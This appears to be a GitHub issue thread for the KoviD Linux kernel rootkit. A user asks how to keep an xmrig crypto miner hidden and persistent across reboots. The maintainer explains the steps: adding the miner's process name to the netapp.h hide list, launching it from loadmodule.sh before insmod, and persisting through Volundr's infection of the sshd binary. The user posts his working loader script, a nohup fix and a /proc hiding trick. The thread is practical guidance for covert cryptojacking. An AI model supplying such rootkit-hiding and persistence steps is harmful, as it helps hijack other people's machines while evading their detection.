Help with startup.

[charlesmigel]

i get this problem

root@Ubuntu-2004:/KoviD# sudo insmod ./kovid.ko root@Ubuntu-2004:/KoviD# cd volundr/ root@Ubuntu-2004:/KoviD/volundr# ./install.sh /usr/sbin/sshd -bash: ./install.sh: No such file or directory root@Ubuntu-2004:/KoviD/volundr# cd .. root@Ubuntu-2004:/KoviD# cd scripts/ root@Ubuntu-2004:/KoviD/scripts# ./install.sh /usr/sbin/sshd Error: KoviD not running Use: [override variables] ./install.sh

override defaults: VOLUNDR, KOVID, LOADER

VOLUNDR: point to Volundr directory entry point default: ../volundr

KOVID: point to KoviD module default: ../kovid

LOADER: point to loader script default: ../loadmodule.sh

Examples:

./install.sh /usr/sbin/sshd

# VOLUNDR=/tmp/Volundr ./install.sh /usr/sbin/sshd
# KOVID=/tmp/kovid.ko LOADER=/tmp/loadmodule.sh ./install.sh /usr/sbin/sshd
$ sudo KOVID=/root/kovid.ko ./install.sh /usr/sbin/sshd

Before running this script, make sure to: KoviD: build and insmod Volundr: build

root@Ubuntu-2004:~/KoviD/scripts# sudo ./install.sh /usr/sbin/sshd Error: KoviD not running Use: [override variables] ./install.sh

override defaults: VOLUNDR, KOVID, LOADER

VOLUNDR: point to Volundr directory entry point default: ../volundr

KOVID: point to KoviD module default: ../kovid

LOADER: point to loader script default: ../loadmodule.sh

Examples:

./install.sh /usr/sbin/sshd

# VOLUNDR=/tmp/Volundr ./install.sh /usr/sbin/sshd
# KOVID=/tmp/kovid.ko LOADER=/tmp/loadmodule.sh ./install.sh /usr/sbin/sshd
$ sudo KOVID=/root/kovid.ko ./install.sh /usr/sbin/sshd

Before running this script, make sure to: KoviD: build and insmod Volundr: build

root@Ubuntu-2004:/KoviD/scripts# lsmod | grep kovid kovid 57344 0 root@Ubuntu-2004:/KoviD/scripts#

here check [ 991.632130] hide [0000000002971b70] irq/100_pciehp : 2501 [ 991.632133] addname '.kovid' ro=1 [ 991.632134] addname 'kovid' ro=1 [ 991.632135] addname '.kv.ko' ro=1 [ 991.632136] addname '.lm.sh' ro=1 [ 991.632138] addname '.sshd_orig' ro=1 [ 991.632139] addname 'whitenose' ro=1 [ 991.632140] addname 'pinknose' ro=1 [ 991.632141] addname 'rednose' ro=1 [ 991.632142] addname 'greynose' ro=1 [ 991.632143] addname 'purplenose' ro=1 [ 991.632145] addname 'blacknose' ro=1 [ 991.632146] addname 'bluenose' ro=1 [ 991.632415] kovid loaded. root@Ubuntu-2004:/KoviD/scripts# lsmod | grep kovid kovid 57344 0 root@Ubuntu-2004:/KoviD/scripts#

here check [ 991.632130] hide [0000000002971b70] irq/100_pciehp : 2501 [ 991.632133] addname '.kovid' ro=1 [ 991.632134] addname 'kovid' ro=1 [ 991.632135] addname '.kv.ko' ro=1 [ 991.632136] addname '.lm.sh' ro=1 [ 991.632138] addname '.sshd_orig' ro=1 [ 991.632139] addname 'whitenose' ro=1 [ 991.632140] addname 'pinknose' ro=1 [ 991.632141] addname 'rednose' ro=1 [ 991.632142] addname 'greynose' ro=1 [ 991.632143] addname 'purplenose' ro=1 [ 991.632145] addname 'blacknose' ro=1 [ 991.632146] addname 'bluenose' ro=1 [ 991.632415] kovid loaded.

[charlesmigel]

i get this problem

root@Ubuntu-2004:~/KoviD# sudo insmod ./kovid.ko root@Ubuntu-2004:~/KoviD# cd volundr/ root@Ubuntu-2004:~/KoviD/volundr# ./install.sh /usr/sbin/sshd -bash: ./install.sh: No such file or directory root@Ubuntu-2004:~/KoviD/volundr# cd .. root@Ubuntu-2004:~/KoviD# cd scripts/ root@Ubuntu-2004:~/KoviD/scripts# ./install.sh /usr/sbin/sshd Error: KoviD not running Use: [override variables] ./install.sh

override defaults: VOLUNDR, KOVID, LOADER

VOLUNDR: point to Volundr directory entry point
    default: ../volundr

KOVID:  point to KoviD module
    default: ../kovid

LOADER: point to loader script
    default: ../loadmodule.sh

Examples:
    # ./install.sh /usr/sbin/sshd
    # VOLUNDR=/tmp/Volundr ./install.sh /usr/sbin/sshd
    # KOVID=/tmp/kovid.ko LOADER=/tmp/loadmodule.sh ./install.sh /usr/sbin/sshd
    $ sudo KOVID=/root/kovid.ko ./install.sh /usr/sbin/sshd

Before running this script, make sure to:
KoviD:      build and insmod
Volundr:    build

root@Ubuntu-2004:~/KoviD/scripts# sudo ./install.sh /usr/sbin/sshd Error: KoviD not running Use: [override variables] ./install.sh

override defaults: VOLUNDR, KOVID, LOADER

VOLUNDR: point to Volundr directory entry point
    default: ../volundr

KOVID:  point to KoviD module
    default: ../kovid

LOADER: point to loader script
    default: ../loadmodule.sh

Examples:
    # ./install.sh /usr/sbin/sshd
    # VOLUNDR=/tmp/Volundr ./install.sh /usr/sbin/sshd
    # KOVID=/tmp/kovid.ko LOADER=/tmp/loadmodule.sh ./install.sh /usr/sbin/sshd
    $ sudo KOVID=/root/kovid.ko ./install.sh /usr/sbin/sshd

Before running this script, make sure to:
KoviD:      build and insmod
Volundr:    build

root@Ubuntu-2004:~/KoviD/scripts# lsmod | grep kovid kovid 57344 0 root@Ubuntu-2004:~/KoviD/scripts#

here check [ 991.632130] hide [0000000002971b70] irq/100_pciehp : 2501 [ 991.632133] addname '.kovid' ro=1 [ 991.632134] addname 'kovid' ro=1 [ 991.632135] addname '.kv.ko' ro=1 [ 991.632136] addname '.lm.sh' ro=1 [ 991.632138] addname '.sshd_orig' ro=1 [ 991.632139] addname 'whitenose' ro=1 [ 991.632140] addname 'pinknose' ro=1 [ 991.632141] addname 'rednose' ro=1 [ 991.632142] addname 'greynose' ro=1 [ 991.632143] addname 'purplenose' ro=1 [ 991.632145] addname 'blacknose' ro=1 [ 991.632146] addname 'bluenose' ro=1 [ 991.632415] kovid loaded.

[carloslack]

Hi @charlesmigel I will check this myself later, but just to be sure, have you followed what I do here: https://github.com/carloslack/kv-demos/tree/master?tab=readme-ov-file#simple-persistence-using-elf-infection-with-volundr ?

[charlesmigel]

i fix it the install.sh its /proc/kovid i change to mine /proc/my name then it worked

[charlesmigel]

But one more question: If I were to have a startup on Kovid and it starts, but after a reboot for instance, how do I still keep my crypto miner hidden?

If I were to utilize the Volunur project for this, could you provide some examples of how to do it?

[carloslack]

i fix it the install.sh its /proc/kovid i change to mine /proc/my name then it worked

startup

In this example you only need to manually insmod kovid.ko before running install.sh, after that, if the system is rebooted, kovid will be automatically loaded when (again, in the example) sshd daemon is started, what happens right after the boot.

Another point is that, in this volundr example it works by modifying the daemon binary, it could be easily discovered by a simple checksum toolcheck , as stated in the README, this is just an example, you are free to look for other stealthier mechanisms to enable persistence

[charlesmigel]

yes the startup its working now

[charlesmigel]

but this? But one more question: If I were to have a startup on Kovid and it starts, but after a reboot for instance, how do I still keep my crypto miner hidden?

If I were to utilize the Volunur project for this, could you provide some examples of how to do it?

[carloslack]

you can modify the script in any way you want, th only thing kovid will do is load the script, make sure you redirect all output (including stderr) to /dev/null

[carloslack]

Other option, probably cleaner, is to add the process name you want to be hidden every time kovid is loaded, here: https://github.com/carloslack/KoviD/blob/master/src/netapp.h

[charlesmigel]

Where should I write this? Or can you make the changes for me?

Thanks

[charlesmigel]

im new to this all brother

[carloslack]

just edit netapp.h to include the name of the processes you want to hide, suppose your miner is called "miner":

"whitenose", "pinknose", "rednose", "blacknose",

"greynose", "purplenose", "bluenose", "miner", NULL };

Recompile kovid after that

[charlesmigel]

oh okej will check that

[charlesmigel]

i get this problem now the cpu utage is wrong check this

top - 13:13:01 up 12:29, 3 users, load average: 4.00, 3.73, 2.68 Tasks: 104 total, 1 running, 100 sleeping, 0 stopped, 3 zombie %Cpu(s): 99.5 us, 0.2 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.3 si, 0.0 st MiB Mem : 5921.9 total, 2708.2 free, 2565.0 used, 648.7 buff/cache MiB Swap: 0.0 total, 0.0 free, 0.0 used. 3117.0 avail Mem

PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND                                                               
 14 root      20   0       0      0      0 I   0.3   0.0   2:18.69 rcu_sched                                                             
608 root      20   0   80052   1816   1624 S   0.3   0.0   0:54.52 qemu-ga                                                               
  1 root      20   0  100792  11648   8376 S   0.0   0.2   0:06.63 systemd                                                               
  2 root      20   0       0      0      0 S   0.0   0.0   0:00.01 kthreadd                                                              
  3 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_gp                                                                
  4 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_par_gp                                                            
  5 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 slub_flushw

i use xmrig miner for testing

[charlesmigel]

how do i put the startup on it too https://github.com/carloslack/KoviD/issues/84#issuecomment-2059049814

i get that with the prosees hidde on [netapp.h] but not the startup

[charlesmigel]

there?

[carloslack]

how do i put the startup on it too #84 (comment)

i get that with the prosees hidde on [netapp.h] but not the startup

you may use a combination of both 1) modify the script to load your miner as well (add the miner loading before loading kovid) and 2) add the process name to the array, so when kovid starts the miner is already running and it can be hidden the module

[charlesmigel]

Should xmrig be running before the rootkit is running, how do I include it in the loadmodule .sh script? can you give a exampel

[carloslack]

Should xmrig be running before the rootkit is running, how do I include it in the loadmodule .sh script? can you give a exampel

Yes. In loadmodule.sh on the line before insmod=$(which insmod) add:

xmrig >/dev/null 2>&1

Then add xmrig in netapp.h

Recompile kovid and repeat the process

[charlesmigel]

okay will try it thanks i will let you know in a momment

[charlesmigel]

on this xmrig >/dev/null 2>&1 how it gonna be startup can i add path in to it? or how

thanks

[charlesmigel]

and how do i Hide/list files and directories auto with the rootkit can i add it to load module?

[charlesmigel]

and look att this static const char *netapp_list[] = { "whitenose", "pinknose", "rednose", "blacknose", "greynose", "purplenose", "xmrig-6.21.2", "bluenose", NULL };

endif

[ 3915.176732] ftrace hook 14 on filldir64 [ 3915.176733] ftrace hook 15 on tty_read [ 3915.177149] Waiting for event [ 3915.177231] hide [0000000092bee721] irq/102_pciehp : 10196 [ 3915.177387] hide [000000006c29a161] irq/101_pciehp : 10195 [ 3915.177460] hide [0000000057825dbf] irq/100_pciehp : 10194 [ 3915.177464] addname '.kovid' ro=1 [ 3915.177466] addname 'kovid' ro=1 [ 3915.177467] addname '.kv.ko' ro=1 [ 3915.177468] addname '.lm.sh' ro=1 [ 3915.177469] addname '.sshd_orig' ro=1 [ 3915.177471] addname 'whitenose' ro=1 [ 3915.177472] addname 'pinknose' ro=1 [ 3915.177473] addname 'rednose' ro=1 [ 3915.177474] addname 'greynose' ro=1 [ 3915.177476] addname 'purplenose' ro=1 [ 3915.177477] addname 'blacknose' ro=1 [ 3915.177478] addname 'bluenose' ro=1 [ 3915.177686] kovid loaded.

what im doing wrong

[carloslack]

show me output of ps qx |grep xmrig

[charlesmigel]

its hidding the xmrig but not the folder xmrig but the cpu utage and the prosess is hidden

[charlesmigel]

[ 5045.795106] ftrace hook 15 on tty_read [ 5045.795619] Waiting for event [ 5045.795709] hide [00000000966b941a] irq/102_pciehp : 11160 [ 5045.795918] hide [000000009bc1a811] irq/101_pciehp : 11159 [ 5045.795943] hide [0000000076d9d0f6] irq/100_pciehp : 11158 [ 5045.795948] addname '.kovid' ro=1 [ 5045.795950] addname 'kovid' ro=1 [ 5045.795951] addname '.kv.ko' ro=1 [ 5045.795952] addname '.lm.sh' ro=1 [ 5045.795954] addname '.sshd_orig' ro=1 [ 5045.795955] addname 'whitenose' ro=1 [ 5045.795956] addname 'pinknose' ro=1 [ 5045.795957] addname 'rednose' ro=1 [ 5045.795957] addname 'greynose' ro=1 [ 5045.795958] addname 'purplenose' ro=1 [ 5045.795959] addname 'blacknose' ro=1 [ 5045.795960] addname 'bluenose' ro=1 [ 5045.796019] kovid loaded. root@Ubuntu-2004:~/KoviD# ps qx |grep xmrig error: process ID list syntax error

Usage: ps [options]

Try 'ps --help <simple|list|output|threads|misc|all>' or 'ps --help <s|l|o|t|m|a>' for additional help text.

For more details see ps(1). root@Ubuntu-2004:~/KoviD# ps qx |grep xmrig error: process ID list syntax error

Usage: ps [options]

Try 'ps --help <simple|list|output|threads|misc|all>' or 'ps --help <s|l|o|t|m|a>' for additional help text.

For more details see ps(1). root@Ubuntu-2004:~/KoviD# ps aux | grep xmrig root 11169 0.0 0.0 8160 720 pts/1 S+ 17:39 0:00 grep --color=auto xmrig root@Ubuntu-2004:~/KoviD# cd .. root@Ubuntu-2004:~# ls KoviD POP snap xmrig-6.21.2 xmrig-6.21.2-linux-static-x64.tar.gz root@Ubuntu-2004:~#

[charlesmigel]

okey no problem here is root@Ubuntu-2004:~# ps ax |grep xmrig 11432 pts/0 S+ 0:00 grep --color=auto xmrig root@Ubuntu-2004:~# ^C

[carloslack]

xmrig is either not running or it is already hidden.

If it is not running then it could be a problem on how you changed loadmodule.sh If it is alreay hidden is strange because when it is hidden you should see a log like Hide netapp task: <name>You need to include the correct name in netapp.h also, the same name you'd see from ps output

[charlesmigel]

okey but what is this [ 5045.795105] ftrace hook 14 on filldir64 [ 5045.795106] ftrace hook 15 on tty_read [ 5045.795619] Waiting for event [ 5045.795709] hide [00000000966b941a] irq/102_pciehp : 11160 [ 5045.795918] hide [000000009bc1a811] irq/101_pciehp : 11159 [ 5045.795943] hide [0000000076d9d0f6] irq/100_pciehp : 11158 [ 5045.795948] addname '.kovid' ro=1 [ 5045.795950] addname 'kovid' ro=1 [ 5045.795951] addname '.kv.ko' ro=1 [ 5045.795952] addname '.lm.sh' ro=1 [ 5045.795954] addname '.sshd_orig' ro=1 [ 5045.795955] addname 'whitenose' ro=1 [ 5045.795956] addname 'pinknose' ro=1 [ 5045.795957] addname 'rednose' ro=1 [ 5045.795957] addname 'greynose' ro=1 [ 5045.795958] addname 'purplenose' ro=1 [ 5045.795959] addname 'blacknose' ro=1 [ 5045.795960] addname 'bluenose' ro=1 [ 5045.796019] kovid loaded.

[ 5045.795709] hide [00000000966b941a] irq/102_pciehp : 11160 [ 5045.795918] hide [000000009bc1a811] irq/101_pciehp : 11159 [ 5045.795943] hide [0000000076d9d0f6] irq/100_pciehp : 11158

i can show you the loadmodule.sh root@Ubuntu-2004:~/KoviD/src# cat loadmodule.sh

!/bin/bash

/root/xmrig-6.21.2/xmrig >/dev/null 2>&1 insmod=$(which insmod) $insmod "$1" >/dev/null 2>&1 root@Ubuntu-2004:~/KoviD/src#

and i have try xmrig >/dev/null 2>&1 and xmrig is in /usr/local/bin its the same

[charlesmigel]

there?

[charlesmigel]

hello its the startup not the net.h can you test with xmrig

[carloslack]

hello its the startup not the net.h can you test with xmrig

I will try myself when I find some available time, I will share here my results ok?

[charlesmigel]

okey thanks

I have also tested the hide function on xmrig.

When you start xmrig and it uses around 80% of the CPU, and then it starts three different xmrig processes and one, for example, takes 100%, this rootkit only removes one process and hides the names of all other processes with xmrig. It doesn't hide the other two processes, which is why the CPU usage goes up to 100%.

And if you manually hide the xmrig process with 'echo 14886 >/proc/mytest', when all three are hidden, the CPU usage does not show as 100%.

Here's an example run in the terminal

[charlesmigel]

and in the startup in xmrig i have fix it the problem is you need to put this nohup xmrig >/dev/null 2>&1 & then its working

[charlesmigel]

when i do htop on xmrig i get more pid the rootkit its hiding only 1 PID i need to hidde all pid can you help ??

[carloslack]

Hi @charlesmigel I'll see if I can look at this soon

[charlesmigel]

okey i have fix it all the startup of xmrig its only the cpu utage with all PID pls fix it today i need help

do you have telegram or wathsapp i can add? for faster respons

[carloslack]

Not planed, good luck